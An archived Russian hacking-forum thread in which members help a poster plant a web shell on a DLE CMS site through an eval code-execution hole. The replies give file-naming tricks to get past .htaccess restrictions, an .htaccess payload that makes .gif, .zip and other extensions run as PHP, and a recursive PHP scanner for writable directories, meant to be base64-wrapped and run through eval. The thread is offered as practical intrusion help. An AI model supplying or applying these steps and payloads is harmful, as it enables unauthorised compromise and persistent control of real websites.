Просмотр полной версии : Уязвимость в Dle
smiles4you
16.09.2017, 11:44
Добрый день. В пхп не силен, но требуется помощь. Есть сайт на дле, есть вывод eval phpinfo();
url_fopen on
url_include off
Есть папка под запись, но есть и хтацес в корне с отключением обработки пхп пхтмл и т.д. в этой папке. Локальный инклуд "помогает" сделать Hacking attempt!.
Можете подсказать как залить полноценный шелл?
Попробуйте залить шелл в папку /tmp (если не включен open_basedir) и затем сделайте include его через rce уязвимость которую нашли, да и вряд ли в корне лежал бы файл в котором заблокирована обработка РНР, как же тогда работает сайт, скорее всего там указано, что только для файлов у которых название совпадает с файлами CMS DLE разрешено использование РНР (попадался такой случай), попробуйте назвать свой шелл так же, но в другой папке, дабы не затереть существующий файл, например залить в /engine/ajax/init.php или /engine/ajax/engine.php. Но это только догадки, предоставьте больше информации...
winstrool
17.09.2017, 15:27
↑ (https://antichat.live/posts/4128708/)
Добрый день. В пхп не силен, но требуется помощь. Есть сайт на дле, есть вывод eval phpinfo();
url_fopen on
url_include off
Есть папка под запись, но есть и хтацес в корне с отключением обработки пхп пхтмл и т.д. в этой папке. Локальный инклуд "помогает" сделать Hacking attempt!.
Можете подсказать как залить полноценный шелл?
как вариант переписать корневой htaccess, т.е сначала его читаете, убираете нужные записи, а потом перезаписываете, второй как вариант можно попробовать залить шел с названием index.php к примеру в папку /img и потом так и обратитесь к шелу site.us/img/, т.е при обращение к папке по умолчанию интерпретируются индексные файлы....
smiles4you
18.09.2017, 11:18
Суть в том что ничего кроме этой папки под запись нет. На счет обработки пхп, думал одно написал другое) Разрешены только индекс.пхп и админ.пхп.
winstrool
18.09.2017, 11:35
Попробуйте тогда в ту папку залить htaccess c содержымым:
Options All -Indexes
php_flag engine 1
php_flag engine 1
AddHandler php5-script .php
AddHandler php5-script .gif
Options +ExecCGI
AddType text/html .shtml
AddHandler server-parsed .shtml
AddType application/x-httpd-php .fla
AddType application/x-httpd-php .phtml
AddType application/x-httpd-php .gif
AddType application/x-httpd-php .php4
AddType application/x-httpd-php .zip
AddType application/x-httpd-php .php
smiles4you
22.09.2017, 21:54
Тоже не проканало. Другой вопрос. Есть возможность через евал запрос вывести список файлов и папок под запись? Или хотя бы метод работы через if.
В смысле print, copy, phpinfo() работает а вот если if то уже фиг) А как без if работь хотя бы с if_writable?
gena ryzhov
25.11.2017, 16:44
↑ (https://antichat.live/posts/4131021/)
Тоже не проканало. Другой вопрос. Есть возможность через евал запрос вывести список файлов и папок под запись? Или хотя бы метод работы через if.
В смысле print, copy, phpinfo() работает а вот если if то уже фиг) А как без if работь хотя бы с if_writable?
Через евал можно все что угодно!
gena ryzhov
25.11.2017, 17:19
gena ryzhov said:
↑ (https://antichat.live/posts/4153421/)
Через евал можно все что угодно!
Попробуй такой код:
function scan_dir($dirname) {
$dir = opendir($dirname);
while (($file = readdir($dir)) !== false) {
if ($file != "." && $file != "..") {
$file_name = rtrim($dirname,'/')."/".$file;
if (is_dir($file_name)) {
if(is_writeable($file_name)) {
echo "Dir writeable - ".realpath($file_name)."
\n";
}
scan_dir($file_name);
}
}
}
closedir($dir);
}
scan_dir($_SERVER['DOCUMENT_ROOT']);
только заверни его в base64_decode() и закинь в евал!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot